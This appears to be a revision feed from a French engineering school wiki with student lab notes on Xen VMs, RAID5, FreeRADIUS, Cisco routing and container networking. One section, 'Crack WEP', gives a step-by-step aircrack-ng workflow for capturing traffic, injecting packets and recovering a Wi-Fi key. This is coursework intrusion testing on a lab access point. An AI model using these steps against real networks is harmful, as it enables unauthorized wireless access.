                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN&lt;br /&gt;
&lt;br /&gt;
==== Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49078</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49078"/>
				<updated>2018-12-21T13:51:08Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Création d'une machine virtuelle Xen Linux sur Cordouan */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
